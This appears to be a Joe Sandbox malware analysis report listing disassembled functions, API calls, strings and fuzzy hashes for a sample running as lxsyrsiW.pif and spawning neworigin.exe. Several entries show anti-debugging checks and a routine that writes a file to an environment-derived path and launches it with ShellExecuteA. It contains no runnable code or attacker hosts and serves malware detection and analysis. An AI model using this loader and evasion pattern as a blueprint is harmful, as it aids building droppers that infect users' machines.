
IsDebuggerPresent, xrefs: 02DAF6FA
KernelBase, xrefs: 02DAF6E9

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsDebuggerPresent$KernelBase
API String ID: 1646373207-2367923768
Opcode ID: 24cb8792cb1bf271635ad831aec202929aecc2428ecd6b37b36df4ec652720c9
Instruction ID: c4420335d07fcb008beec04f10c416666c503c88173682bd236a7c249aa08727
Opcode Fuzzy Hash: 24cb8792cb1bf271635ad831aec202929aecc2428ecd6b37b36df4ec652720c9
Instruction Fuzzy Hash: 81D012B23503901DBF0073F42CD4D19038CC55452D7300FE0B022C67E2E5A7CC195168

Function 02D9C474 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,02DBD10B,00000000,02DBD11E), ref: 02D9C47A
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02D9C48B

Strings

GetDiskFreeSpaceExA, xrefs: 02D9C485
kernel32.dll, xrefs: 02D9C475

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: 00f082fdce1a71d77c8d6d0fcaae6398f8b1c6378f01a9fd62d8ee1b490c99e1
Instruction ID: f20bd2a0beaf0cec1b08eedcb65976defc093db0110822f995ffaf7dfcde23b3
Opcode Fuzzy Hash: 00f082fdce1a71d77c8d6d0fcaae6398f8b1c6378f01a9fd62d8ee1b490c99e1
Instruction Fuzzy Hash: 6BD05EF4BA0744DAFF01AAB1A490635239CC34D310F404866F40157300E76AAC148F64

Function 02D9E1E8 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02D9E297
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02D9E2B3
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02D9E32A
VariantClear.OLEAUT32(?), ref: 02D9E353

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction ID: 6b625c1f0dbd3d85ccd19ee125f505e8490694a149c8693e3f18a169046a2a30
Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction Fuzzy Hash: E141F775A012299BCF62DB58CD90BC9B3BDEB49315F0046D6F648A7312DA30AF808F60

Function 02D9AD3C Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 02D9AD59
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02D9AD7D
GetModuleFileNameA.KERNEL32(02D90000,?,00000105), ref: 02D9AD98
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02D9AE2E

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 7ee77be7212352bf979b7e80f9087e97392daf924b1dac41f6ab3e8ac028b5cc
Instruction ID: a21b39cc3f4a4eb4ec1e8971c3a18c633d52e34f75b3ff41ab7690ceb90da002
Opcode Fuzzy Hash: 7ee77be7212352bf979b7e80f9087e97392daf924b1dac41f6ab3e8ac028b5cc
Instruction Fuzzy Hash: B341F571A402689BDF61DB68CC84BDAB7FDAB08304F4440E6B548E7341DB74AF848FA0

Function 02D9AD3A Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 02D9AD59
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02D9AD7D
GetModuleFileNameA.KERNEL32(02D90000,?,00000105), ref: 02D9AD98
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02D9AE2E

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 6956bd601072a0395665c8cc2b7cf0819144f0f59b80262c0655d543b6497d00
Instruction ID: 158bacee0c0720ad98d654937a339265eca259a1f377f5b4a2b2cc3a3c617aec
Opcode Fuzzy Hash: 6956bd601072a0395665c8cc2b7cf0819144f0f59b80262c0655d543b6497d00
Instruction Fuzzy Hash: 7C410771A402589BDF61DB68CC84BDAB7FDAB08304F4400E6B548E7341DB749E848FA0

Function 02D91C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 523c7d93cbcd476289444910467d3aa6167e731b31a057293729ab2c8d32c3f4
Instruction ID: d92fad224b915ac39ab6538307d21652189c553a6b7474a8906e26e169033994
Opcode Fuzzy Hash: 523c7d93cbcd476289444910467d3aa6167e731b31a057293729ab2c8d32c3f4
Instruction Fuzzy Hash: 36A1D2B77106060BDF19AA7D9C803ADB2D6DBC5325F18827AF11DCB3C5EB68CD468650

Function 02D994EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02D995DA), ref: 02D99572
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02D995DA), ref: 02D99578

Strings

yyyy, xrefs: 02D9954D

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: d81f3712e107210b992f54a2f616c6c853d2ecbd5bbe870638401e3a23194dbc
Instruction ID: c0a1577eb703637540579848d170d4dffb6a9d44deada7d17a5f0112cfb58114
Opcode Fuzzy Hash: d81f3712e107210b992f54a2f616c6c853d2ecbd5bbe870638401e3a23194dbc
Instruction Fuzzy Hash: AB214B71A042589FDF50EFA8C891AEEB3B9EF09710F4140A9F805E7351E630DE41CBA5

Function 02DA8338 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 02DA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DA823C,?,?,00000000,?,02DA7A7E,ntdll,00000000,00000000,02DA7AC3,?,?,00000000), ref: 02DA820A
Part of subcall function 02DA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DA821E

Part of subcall function 02DA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DA82FC,?,?,00000000,00000000,?,02DA8215,00000000,KernelBASE,00000000,00000000,02DA823C), ref: 02DA82C1
Part of subcall function 02DA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DA82C7
Part of subcall function 02DA8274: GetProcAddress.KERNEL32(?,?), ref: 02DA82D9

FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02DA83C2), ref: 02DA83A4

Strings

FlushInstructionCache, xrefs: 02DA8351
Kernel32, xrefs: 02DA8383

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$CacheFlushInstruction
String ID: FlushInstructionCache$Kernel32
API String ID: 3811539418-184458249
Opcode ID: a77873fa4cc982736837346c1bf52eda994e8c099453f482222e2ad2a991a407
Instruction ID: 96c5bec4b91571cde560bebf961d642ff2207eb91bdb9a74dfd0c94c86fcded5
Opcode Fuzzy Hash: a77873fa4cc982736837346c1bf52eda994e8c099453f482222e2ad2a991a407
Instruction Fuzzy Hash: 9F016971680304BFEB00EFA5EC61F5AB7EDEB09B00F918860BD05D6740D670AD559A24

Function 02DAAF24 Relevance: 5.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 02DAAF58
IsBadWritePtr.KERNEL32(?,00000004), ref: 02DAAF88
IsBadReadPtr.KERNEL32(?,00000008), ref: 02DAAFA7
IsBadReadPtr.KERNEL32(?,00000004), ref: 02DAAFB3

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: Read$Write
String ID:
API String ID: 3448952669-0
Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
Instruction ID: cc37fdd7300610beb039bc0337995a838b23fe9e0a10f5aea4ae0d1aac7550fe
Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
Instruction Fuzzy Hash: 48214DB264061A9BDF14EE69CC90BAA77B9EB84351F004652FE1497380D738ED11CAA4

Analysis Process: lxsyrsiW.pifPID: 2924, Parent PID: 4308COMMON

Execution Graph

Execution Coverage:	27.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.1%
Total number of Nodes:	32
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0040108C Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 207
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004010A6
memset.MSVCRT ref: 004010EE
strcmp.MSVCRT ref: 00401180
strcpy.MSVCRT(?,00000000), ref: 004011CE
EntryPoint.LXSYRSIW(?,?), ref: 004011BE

Part of subcall function 00401000: malloc.MSVCRT ref: 0040100F

EntryPoint.LXSYRSIW(?,?), ref: 00401202
getenv.MSVCRT ref: 0040120B
EntryPoint.LXSYRSIW(?,?), ref: 00401246
sprintf.MSVCRT ref: 00401263
fopen.MSVCRT ref: 00401278
EntryPoint.LXSYRSIW(?,?), ref: 004012B3
fwrite.MSVCRT ref: 004012DD
fclose.MSVCRT ref: 004012EC
EntryPoint.LXSYRSIW(00477C65,00000004), ref: 0040131C
ShellExecuteA.SHELL32(00000000,00000000,?,0000000A,0000000A,0000000A), ref: 00401344

Strings

%s\%s, xrefs: 00401256, 0040125B

Memory Dump Source

Source File: 0000000B.00000001.2122152486.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000001.2122152486.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000001.2122152486.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_1_400000_lxsyrsiW.jbxd

Similarity

API ID: EntryPoint$memset$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
String ID: %s\%s
API String ID: 2742963760-4073750446
Opcode ID: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
Instruction ID: 7e0938a0f735226449982c757e1a15bee8303af7c1bff0ef3dea70518ca31291
Opcode Fuzzy Hash: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
Instruction Fuzzy Hash: 9971F4F1E001049BDB54DB9CDC81B9E77B9DB48309F04417AF60AFB391E639AA448B59

Function 00401155 Relevance: 13.6, APIs: 9, Instructions: 113
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strcmp.MSVCRT ref: 00401180
strcpy.MSVCRT(?,00000000), ref: 004011CE
EntryPoint.LXSYRSIW(?,?), ref: 004011BE

Part of subcall function 00401000: malloc.MSVCRT ref: 0040100F

EntryPoint.LXSYRSIW(?,?), ref: 00401202
getenv.MSVCRT ref: 0040120B
EntryPoint.LXSYRSIW(?,?), ref: 00401246
sprintf.MSVCRT ref: 00401263
fopen.MSVCRT ref: 00401278
EntryPoint.LXSYRSIW(?,?), ref: 004012B3
fwrite.MSVCRT ref: 004012DD
fclose.MSVCRT ref: 004012EC
EntryPoint.LXSYRSIW(00477C65,00000004), ref: 0040131C
ShellExecuteA.SHELL32(00000000,00000000,?,0000000A,0000000A,0000000A), ref: 00401344

Memory Dump Source

Source File: 0000000B.00000001.2122152486.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000001.2122152486.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000001.2122152486.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_1_400000_lxsyrsiW.jbxd

Similarity

API ID: EntryPoint$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
String ID:
API String ID: 2992075992-0
Opcode ID: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
Instruction ID: da6ba3fb88c20024e61c29d0d1421e634aa01f37861d58f563f893074dd25450
Opcode Fuzzy Hash: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
Instruction Fuzzy Hash: F54135F0E101049BDB58DB58DC91B9D77B9DB44309F0441BAF60AFB391E63CAA88CB59

Function 00401475 Relevance: 7.6, APIs: 5, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040148F
__set_app_type.MSVCRT ref: 004014A8
_controlfp.MSVCRT ref: 004014BC
__getmainargs.MSVCRT ref: 004014EA
exit.MSVCRT ref: 0040151C

Memory Dump Source

Source File: 0000000B.00000001.2122152486.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000001.2122152486.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000001.2122152486.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_1_400000_lxsyrsiW.jbxd

Similarity

API ID: __getmainargs__set_app_type_controlfpexitmemset
String ID:
API String ID: 1611591150-0
Opcode ID: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
Instruction ID: 9bdd3bf799432f41f787d58fcaaf5403f241b1bf87296188f28308fcf3b5ab6f
Opcode Fuzzy Hash: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
Instruction Fuzzy Hash: CA110CF5E00104AFCB01EBB8EC85F4A77ACA74C304F50447AB909E7361E979EA448769

Function 00401000 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 0040100F

Strings

j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv, xrefs: 0040106E

Memory Dump Source

Source File: 0000000B.00000001.2122152486.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000001.2122152486.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000001.2122152486.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_1_400000_lxsyrsiW.jbxd

Similarity

API ID: malloc
String ID: j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv
API String ID: 2803490479-2443507578
Opcode ID: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
Instruction ID: 9430970044b5224a9c12c246655217461080a0914b4116f12426152c687b188d
Opcode Fuzzy Hash: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
Instruction Fuzzy Hash: 1B110CB0A05248EFCB04CFACD4907ADBBF1EF49304F1480AAE856E7391D635AE41DB45

Function 004013FF Relevance: 2.5, Strings: 2, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D`:vD`:v, xrefs: 00401438, 0040143D
D`:vD`:v, xrefs: 00401411, 00401414

Memory Dump Source

Source File: 0000000B.00000001.2122152486.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000001.2122152486.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000001.2122152486.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_1_400000_lxsyrsiW.jbxd

Similarity

API ID: memset$EntryPointfopenstrcmpstrcpy
String ID: D`:vD`:v$D`:vD`:v
API String ID: 4108700736-3916433284
Opcode ID: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
Instruction ID: 7b5742814f41c47d4244d2c3f0283e0289412fe64b87ae5b76c2526650b71fed
Opcode Fuzzy Hash: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
Instruction Fuzzy Hash: 4BF074B5A04248AFCB40EFB9D981D8A77F8BB4C304B5044B6F948D7351E674EA448B58

Non-executed Functions

Function 004015D7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000001.2122152486.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000001.2122152486.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000001.2122152486.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_1_400000_lxsyrsiW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1956bb551ae66424eeb29415ec14ed0c03fc86ff94ae4dcffb4638495b0d7fb1
Instruction ID: 66f553c3c70c46b8825420ed88d2deaa6b5bdf89b3e430e74c23cac08a3ac52f
Opcode Fuzzy Hash: 1956bb551ae66424eeb29415ec14ed0c03fc86ff94ae4dcffb4638495b0d7fb1
Instruction Fuzzy Hash: 65A00457F1D540DFD71317107C5515037745F1554575D4CF3445545053D11D44445535

Analysis Process: neworigin.exePID: 6488, Parent PID: 2924COMMON

Execution Graph

Execution Coverage:	13.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	194
Total number of Limit Nodes:	24

Executed Functions

Function 065C3178 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 065C38C4
$]q, xrefs: 065C38A0
$]q, xrefs: 065C38AC
$]q, xrefs: 065C3883
$]q, xrefs: 065C38D0
$]q, xrefs: 065C3877

Memory Dump Source

Source File: 0000000C.00000002.2389896683.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65c0000_neworigin.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-3723351465
Opcode ID: 749b38ae0fcac93b3f6553b2f9da5d61572568393681ec4cdb4889ed61edcae9
Instruction ID: 4e5ffa3b1f7cd9eecae4b04493f2c9230b911f75b22a09b4d409f3a8c33ddef0
Opcode Fuzzy Hash: 749b38ae0fcac93b3f6553b2f9da5d61572568393681ec4cdb4889ed61edcae9
Instruction Fuzzy Hash: 09322031E1061A8FCB55EFB8C89459DB7B6FFC9310F10C669D449A7264EB30A986CF81

Function 065C7E78 Relevance: 3.0, Strings: 2, Instructions: 478
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 065C841F
$]q, xrefs: 065C8413

Memory Dump Source

Source File: 0000000C.00000002.2389896683.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65c0000_neworigin.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: d9da41688d0e19d50cfb4f219142a154be54f7bffd01b0e63c69cfca8fad8d56
Instruction ID: d5ba662fa542adb5d0ac44db3c42e8846d42399aabc3f2e0060af6a139a0d74a
Opcode Fuzzy Hash: d9da41688d0e19d50cfb4f219142a154be54f7bffd01b0e63c69cfca8fad8d56
Instruction Fuzzy Hash: 5402AE30B002059FDB54DFA8D990AAEBBE6FF84314F14896DD4199B394DB34EC46CB81

Function 065C2350 Relevance: 1.1, Instructions: 1063COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2389896683.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65c0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ec10e727ac10ce7c637d59896c1278a028ac0e0140750b308f43788ceecff6c
Instruction ID: ed2da3dcdcc842167bba060945524dbb7a57ae05cdfc1d032bad574d5381705f
Opcode Fuzzy Hash: 9ec10e727ac10ce7c637d59896c1278a028ac0e0140750b308f43788ceecff6c
Instruction Fuzzy Hash: 97A21434A002088FDBA4DBA8C584B9DB7F2FB49324F54C4A9D409AB365DB35ED86CF51

Function 065C66E8 Relevance: .8, Instructions: 818COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2389896683.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65c0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a410b171279a66f065ea6c79d67ae85fd72712d61071fad54cc9ffb4ff0849e
Instruction ID: 8ce92d5799f53eecc94d519e8476b53cc7132fb814a84579629632927d4af31e
Opcode Fuzzy Hash: 6a410b171279a66f065ea6c79d67ae85fd72712d61071fad54cc9ffb4ff0849e
Instruction Fuzzy Hash: 0F628C34A002059FDB54DBA8D594AADB7F2FF88324F148469E40AEB394DB35ED46CF81

Function 065CC2A0 Relevance: .6, Instructions: 639COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2389896683.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65c0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a81c0df323ce9913719394404ab2b02f6fa1e213adef906a45b243529f420475
Instruction ID: 42e7f4e67afcdb631538d2008ec4e403f6931a0d55a35372d408b8a477dc4cce
Opcode Fuzzy Hash: a81c0df323ce9913719394404ab2b02f6fa1e213adef906a45b243529f420475
Instruction Fuzzy Hash: 02326E34A102099FDF54DFA8D990AAEB7B6FB88320F108529D409EB355DB35EC46CF91

Function 065C56B8 Relevance: .6, Instructions: 589COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2389896683.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65c0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ab6754e05eaf12f7a5ab90c2641bd40a87328667b748341b173404503bac656
Instruction ID: 45fea60449cddb87a85f2fae5acdc16585004a4d94974eda7d6e7f5c4d4ec979
Opcode Fuzzy Hash: 0ab6754e05eaf12f7a5ab90c2641bd40a87328667b748341b173404503bac656
Instruction Fuzzy Hash: 3212C231E002159FDB64DBE4C8906AEB7B2FF84320F248469D54A9B345EB34ED56CF91

Function 065CB32A Relevance: .6, Instructions: 588COMMON

Download Yara Rule

Memory Dump Source

